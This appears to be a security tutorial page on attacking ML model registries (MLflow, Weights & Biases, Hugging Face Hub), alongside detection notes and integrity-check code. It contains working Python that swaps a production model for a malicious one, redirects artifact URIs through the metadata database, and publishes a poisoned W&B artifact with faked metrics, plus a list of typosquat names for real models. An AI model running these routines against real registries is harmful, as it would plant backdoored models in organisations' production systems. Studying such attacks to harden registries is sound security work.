Poisoning Model Registries
Advanced techniques for attacking model registries like MLflow, Weights & Biases, and Hugging Face Hub, including model replacement attacks, metadata manipulation, artifact poisoning, and supply chain compromise through registry infrastructure.
Model registries are the central distribution point for ML models within organizations. Platforms like MLflow, Weights & Biases, and internal registries serve as the authoritative source for which model version runs in production.
Compromising a model registry gives an attacker the ability to replace production models, insert backdoors, and poison the entire downstream consumption chain without touching the training pipeline.
Model Registry Architecture
Common Registry Platforms
| Platform | Storage Backend | API Type | Authentication | Typical Deployment |
|---|---|---|---|---|
| MLflow | S3, GCS, Azure Blob, local FS | REST API | Token-based (often none for OSS) | Self-hosted, Databricks managed |
| Weights & Biases | W&B cloud, S3 | REST + GraphQL | API key | SaaS, self-hosted server |
| Hugging Face Hub | HF cloud storage | REST API + Git LFS | Token-based | SaaS, on-prem mirror |
| Vertex AI Model Registry | GCS | gRPC + REST | IAM | GCP managed |
| SageMaker Model Registry | S3 | AWS API | IAM | AWS managed |
| Custom (internal) | Varies | REST API | Varies | Self-hosted |
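The authentication column above matters because several of these platforms ship without enforced authentication; a probe against a registry API can classify its posture from the response alone. A minimal sketch (the status-code mapping is an illustrative heuristic, not platform-specific behavior):

```python
def classify_auth_posture(status_code: int) -> str:
    """Map the HTTP status of an unauthenticated probe to an auth posture."""
    if status_code == 200:
        return "open"            # API answered without credentials
    if status_code in (401, 403):
        return "auth_required"   # credentials are enforced
    if status_code in (301, 302, 307, 308):
        return "redirect"        # frequently an SSO login page
    return "unknown"
```

In practice this would be driven by an HTTP GET against each platform's model-listing endpoint, as the MLflow enumeration example later in this page does.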
Attack Surface Map
┌─────────────────────────────────────────────────┐
│ Model Registry │
│ │
│ ┌──────────────┐ ┌───────────────────────┐ │
│ │ API Layer │ │ Web UI / Dashboard │ │
│ │ (REST/gRPC) │ │ (metadata browsing) │ │
│ └──────┬───────┘ └───────────┬───────────┘ │
│ │ │ │
│ ┌──────┴───────────────────────┴───────────┐ │
│ │ Metadata Store (DB) │ │
│ │ - Model versions, stages, tags │ │
│ │ - Run links, metric history │ │
│ │ - Artifact URIs (pointers to storage) │ │
│ └──────────────────┬───────────────────────┘ │
│ │ │
│ ┌──────────────────┴───────────────────────┐ │
│ │ Artifact Storage Backend │ │
│ │ - S3 bucket / GCS bucket │ │
│ │ - Model weights (.pt, .bin, .safetensors)│ │
│ │ - Config files, tokenizers │ │
│ └───────────────────────────────────────────┘ │
└─────────────────────────────────────────────────┘
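The artifact URIs held in the metadata store are plain pointers into the storage layer, which is why URI manipulation (covered below) is so effective: whoever controls the pointer controls which bytes get loaded. A sketch of how such a URI decomposes (bucket and key names are illustrative):

```python
from urllib.parse import urlparse

def parse_artifact_uri(uri: str) -> dict:
    """Split a registry artifact URI into scheme, bucket, and object key."""
    parsed = urlparse(uri)
    return {
        "scheme": parsed.scheme,          # e.g. "s3", "gs", "wasbs"
        "bucket": parsed.netloc,          # storage container name
        "key": parsed.path.lstrip("/"),   # object path inside the bucket
    }
```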
MLflow Registry Attacks
Unauthenticated Access
MLflow's open-source tracking server has no authentication by default. Organizations frequently deploy it on internal networks assuming network isolation provides sufficient protection:
import requests
def enumerate_mlflow_registry(mlflow_url: str):
"""
Enumerate an MLflow tracking server for registered models,
versions, and artifact locations.
"""
findings = {
"url": mlflow_url,
"auth_required": False,
"models": [],
"artifact_stores": set(),
}
# Test unauthenticated access
try:
resp = requests.get(
f"{mlflow_url}/api/2.0/mlflow/registered-models/search",
params={"max_results": 100},
timeout=10,
)
if resp.status_code == 200:
findings["auth_required"] = False
models = resp.json().get("registered_models", [])
for model in models:
model_info = {
"name": model["name"],
"latest_versions": [],
"tags": model.get("tags", []),
}
                for version in model.get("latest_versions", []):
                    artifact_uri = version.get("source", "")
                    model_info["latest_versions"].append({
                        "version": version["version"],
                        "stage": version.get("current_stage", "None"),
                        "source": artifact_uri,
                        "status": version.get("status", ""),
                    })
                    # Record the storage backend each version points at
                    if artifact_uri.startswith("s3://"):
                        findings["artifact_stores"].add(f"s3://{artifact_uri.split('/')[2]}")
                    elif artifact_uri.startswith("gs://"):
                        findings["artifact_stores"].add(f"gs://{artifact_uri.split('/')[2]}")
                findings["models"].append(model_info)
elif resp.status_code == 401:
findings["auth_required"] = True
except requests.exceptions.ConnectionError:
findings["error"] = "Connection failed"
findings["artifact_stores"] = list(findings["artifact_stores"])
    return findings

Model Version Replacement
With write access to the MLflow API, an attacker can replace a production model by creating a new version or modifying the stage assignment:
def replace_production_model(
mlflow_url: str,
model_name: str,
malicious_artifact_path: str,
):
"""
Replace a production model in MLflow by registering a new version
and transitioning it to the Production stage.
"""
import mlflow
from mlflow.tracking import MlflowClient
mlflow.set_tracking_uri(mlflow_url)
client = MlflowClient()
# Step 1: Create a new run with the malicious model
with mlflow.start_run() as run:
        mlflow.log_artifact(malicious_artifact_path, artifact_path="model")  # nest under "model/" so the runs:/ URI below resolves
run_id = run.info.run_id
artifact_uri = f"runs:/{run_id}/model"
# Step 2: Register as a new version of the target model
new_version = client.create_model_version(
name=model_name,
source=artifact_uri,
run_id=run_id,
description="Performance improvement (automated)",
)
# Step 3: Transition to Production stage
client.transition_model_version_stage(
name=model_name,
version=new_version.version,
stage="Production",
archive_existing_versions=True, # Archive the legitimate version
)
return {
"action": "model_replaced",
"model": model_name,
"new_version": new_version.version,
"old_versions_archived": True,
    }

Artifact URI Manipulation
MLflow stores artifact locations as URIs in its metadata database. Manipulating these URIs redirects model consumers to attacker-controlled artifacts:
def manipulate_artifact_uri(
mlflow_db_connection: str,
model_name: str,
target_version: int,
malicious_uri: str,
):
"""
Directly modify the artifact URI in MLflow's metadata database
to redirect model loading to an attacker-controlled location.
This attack bypasses API-level controls by targeting the database directly.
Requires database access (common when MLflow uses an unprotected PostgreSQL/MySQL instance).
"""
import sqlalchemy
engine = sqlalchemy.create_engine(mlflow_db_connection)
with engine.connect() as conn:
# Update the source URI for the target model version
conn.execute(
sqlalchemy.text("""
UPDATE model_versions
SET source = :malicious_uri
WHERE name = :model_name AND version = :version
"""),
{
"malicious_uri": malicious_uri,
"model_name": model_name,
"version": target_version,
}
)
conn.commit()
    return {"action": "artifact_uri_redirected", "new_uri": malicious_uri}

Weights & Biases Attack Surface
API Key Exploitation
W&B API keys provide broad access to an organization's experiment data, model artifacts, and project configurations:
def assess_wandb_access(api_key: str, base_url: str = "https://api.wandb.ai"):
"""
Assess the scope of access provided by a W&B API key.
W&B API keys found in code repositories, CI/CD configs,
or environment variables often have organization-wide access.
"""
import wandb
findings = []
# Authenticate with the API key
wandb.login(key=api_key, host=base_url, relogin=True)
api = wandb.Api()
    # Enumerate accessible projects under the key's default entity
    try:
        entity = api.default_entity
        for project in api.projects(entity):
            # Sample runs from each project to gauge access depth
            for run in api.runs(f"{entity}/{project.name}", per_page=5):
                findings.append({
                    "type": "accessible_run",
                    "project": run.project,
                    "entity": run.entity,
                    "state": run.state,
                    "created_at": str(run.created_at),
                })
    except Exception as e:
        findings.append({"error": str(e)})
    # Check for model artifact access in the projects surfaced above
    try:
        for item in [f for f in findings if f.get("type") == "accessible_run"]:
            project_path = f"{item['entity']}/{item['project']}"
            for collection in api.artifact_type("model", project=project_path).collections():
                findings.append({
                    "type": "model_collection",
                    "project": project_path,
                    "name": collection.name,
                })
    except Exception:
        pass
    return findings

Artifact Poisoning via W&B
def poison_wandb_artifact(
entity: str,
project: str,
artifact_name: str,
malicious_model_path: str,
):
"""
Create a new version of a W&B artifact with malicious contents.
If downstream pipelines use 'latest' or 'best' aliases,
the poisoned version will be automatically consumed.
"""
import wandb
run = wandb.init(entity=entity, project=project, job_type="model-upload")
artifact = wandb.Artifact(
name=artifact_name,
type="model",
description="Updated model with performance improvements",
metadata={"accuracy": 0.99, "f1": 0.98}, # Fake good metrics
)
artifact.add_file(malicious_model_path)
run.log_artifact(artifact, aliases=["latest", "best", "production"])
run.finish()
    return {"action": "artifact_poisoned", "artifact": artifact_name}

Hugging Face Hub Attack Vectors
Model Card and README Injection
Hugging Face Hub model cards are rendered as HTML, creating opportunities for social engineering and redirection:
def assess_hf_model_security(model_id: str):
"""
Assess security characteristics of a Hugging Face Hub model.
Check for suspicious configurations, unsafe serialization formats,
and metadata inconsistencies.
"""
    from huggingface_hub import HfApi
api = HfApi()
info = api.model_info(model_id, securityStatus=True)
findings = []
# Check serialization format
files = api.list_repo_files(model_id)
unsafe_formats = [f for f in files if f.endswith((".pkl", ".pickle", ".bin"))]
safe_formats = [f for f in files if f.endswith(".safetensors")]
if unsafe_formats and not safe_formats:
findings.append({
"severity": "HIGH",
"finding": "Model uses only unsafe serialization (pickle/bin)",
"files": unsafe_formats,
"note": "Pickle files can execute arbitrary code on load",
})
    # Check security scan results (attribute name has varied across huggingface_hub versions)
    scan = getattr(info, "security_status", None) or getattr(info, "securityStatus", None)
    if scan:
        findings.append({"security_scan": scan})
    # Check model card metadata (reuse the info fetched above)
    try:
        card = info.card_data
if card:
findings.append({
"model_card": "present",
"license": getattr(card, "license", "unknown"),
"tags": getattr(card, "tags", []),
})
except Exception:
findings.append({"model_card": "missing or unparseable"})
    return findings

Typosquatting and Name Confusion
# Common typosquatting patterns for popular models
typosquat_targets = {
"meta-llama/Llama-3-8B": [
"meta-Ilama/Llama-3-8B", # I vs l
"meta-llama/LLama-3-8B", # capitalization
"meta_llama/Llama-3-8B", # underscore vs hyphen
"meta-llama/Llama-3-8b", # case change
"meta-llama/Llama3-8B", # missing hyphen
],
"openai/whisper-large-v3": [
"openai/whisper-large-v4", # version bump
        "openaI/whisper-large-v3", # capital I for i
        "openai/whisper-Iarge-v3", # capital I for l
],
}

Attack Technique Summary

| Attack Vector | Platform | Difficulty | Detection |
|---|---|---|---|
| Unauthenticated API access | MLflow (OSS) | Low | Network monitoring |
| Model version replacement | MLflow, W&B | Medium | Version audit logs |
| Artifact URI manipulation | MLflow (DB access) | Medium | Database audit |
| API key abuse | W&B, HF Hub | Low (if key found) | API access logs |
| Typosquatting | HF Hub | Low | Name similarity scanning |
| Alias hijacking | W&B | Medium | Alias change alerts |
| Metadata poisoning | All platforms | Low | Metadata validation |
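Name-confusion candidates like those listed earlier can be flagged automatically by screening new model IDs against an allowlist of known-good names. A sketch using stdlib `difflib` (the 0.9 threshold is illustrative, not calibrated):

```python
from difflib import SequenceMatcher

def looks_like_typosquat(candidate: str, legitimate: str, threshold: float = 0.9) -> bool:
    """Flag names that are nearly, but not exactly, a known-good model ID.

    Case-folding catches capitalization swaps; the similarity ratio catches
    single-character substitutions such as 'I' for 'l'.
    """
    if candidate == legitimate:
        return False  # an exact match is the real model, not a squat
    ratio = SequenceMatcher(None, candidate.lower(), legitimate.lower()).ratio()
    return ratio >= threshold
```

A registry could run this check at upload time against its most-downloaded model names and hold near-matches for manual review.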
Storage Backend Attacks
S3 Bucket Misconfigurations
Model registries frequently store artifacts in cloud storage with overly permissive access policies:
import boto3
from botocore.exceptions import ClientError
def assess_model_bucket_security(bucket_name: str):
"""Assess S3 bucket security for a model artifact store."""
s3 = boto3.client("s3")
findings = []
# Check bucket ACL
try:
acl = s3.get_bucket_acl(Bucket=bucket_name)
for grant in acl["Grants"]:
grantee = grant["Grantee"]
if grantee.get("URI") == "http://acs.amazonaws.com/groups/global/AllUsers":
findings.append({
"severity": "CRITICAL",
"finding": "Bucket is publicly accessible",
"permission": grant["Permission"],
})
elif grantee.get("URI") == "http://acs.amazonaws.com/groups/global/AuthenticatedUsers":
findings.append({
"severity": "HIGH",
"finding": "Bucket accessible to all authenticated AWS users",
"permission": grant["Permission"],
})
except ClientError as e:
findings.append({"error": f"ACL check failed: {e}"})
# Check for versioning (important for detecting unauthorized modifications)
try:
versioning = s3.get_bucket_versioning(Bucket=bucket_name)
if versioning.get("Status") != "Enabled":
findings.append({
"severity": "MEDIUM",
"finding": "Bucket versioning not enabled",
"impact": "Cannot detect or recover from unauthorized model replacement",
})
except ClientError as e:
findings.append({"error": f"Versioning check failed: {e}"})
# List model artifacts
try:
objects = s3.list_objects_v2(Bucket=bucket_name, MaxKeys=50)
model_files = [
obj["Key"] for obj in objects.get("Contents", [])
if any(obj["Key"].endswith(ext) for ext in
[".pt", ".bin", ".safetensors", ".pkl", ".onnx"])
]
findings.append({
"model_artifacts_found": len(model_files),
"sample_files": model_files[:10],
})
except ClientError as e:
findings.append({"error": f"List failed: {e}"})
    return findings

Registry Integrity Verification
Implementing Model Signing
Organizations should verify model artifacts cryptographically so that tampering introduced anywhere in the registry path is detectable.
import hashlib
import json
def verify_model_integrity(
model_path: str,
expected_hash: str,
hash_algorithm: str = "sha256",
) -> dict:
"""
Verify model artifact integrity against a known-good hash.
This should be part of every model loading pipeline.
"""
h = hashlib.new(hash_algorithm)
with open(model_path, "rb") as f:
while chunk := f.read(8192):
h.update(chunk)
actual_hash = h.hexdigest()
matches = actual_hash == expected_hash
return {
"path": model_path,
"algorithm": hash_algorithm,
"expected": expected_hash,
"actual": actual_hash,
"integrity_verified": matches,
"action": "SAFE_TO_LOAD" if matches else "DO_NOT_LOAD",
    }

Related Topics
- Model Supply Chain Risks -- broader supply chain attack landscape
- Pickle Deserialization Exploits -- exploiting unsafe model serialization
- Feature Store Manipulation -- attacking another ML data infrastructure component
- ML Pipeline CI/CD Attacks -- attacking the pipeline that feeds registries
- Attacking AI Deployments -- what happens after models leave the registry
References
- "MLflow Documentation: Model Registry" (2025) - Official MLflow model registry documentation including API reference and stage transitions
- "Weights & Biases Model Registry Documentation" (2025) - W&B artifact and model management documentation
- "Hugging Face Hub Security" (2025) - Hugging Face's security scanning, safetensors format, and malware detection capabilities
- Gu et al., "BadNets: Evaluating Backdooring Attacks on Deep Neural Networks" (2019) - Foundational backdoor attack research relevant to model replacement
- MITRE ATLAS, "Poison ML Model" (2023) - Threat framework entries for model poisoning through registry compromise